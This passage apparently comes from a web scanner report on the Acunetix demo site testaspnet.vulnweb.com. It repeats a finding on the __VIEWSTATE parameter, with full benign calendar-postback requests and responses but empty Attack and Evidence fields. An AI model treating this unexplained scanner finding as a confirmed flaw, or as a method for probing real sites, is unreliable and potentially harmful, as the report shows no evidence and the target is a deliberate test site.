style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8205&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAQ6eGUdoIZGRkT907YfFOKlkuMVmUmtEf%2BSVxdu8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2FqPf5CgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2BPiH4MWljddDFTp3vm47uCy6NBOw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:35 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAQ6eGUdoIZGRkT907YfFOKlkuMVmUmtEf+SVxdu8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/qPf5CgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+PiH4MWljddDFTp3vm47uCy6NBOw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:White" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8193&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAATqoYSNoIZGRkvaY8Mw%2Bi3isAAtg8AuvWqm%2BZBmA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLyt8%2B8BgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8WHTN7s2Oyge10yTyvc196UvM4ZQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:39 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAATqoYSNoIZGRkvaY8Mw+i3isAAtg8AuvWqm+ZBmA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyt8+8BgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8WHTN7s2Oyge10yTyvc196UvM4ZQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:White" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a 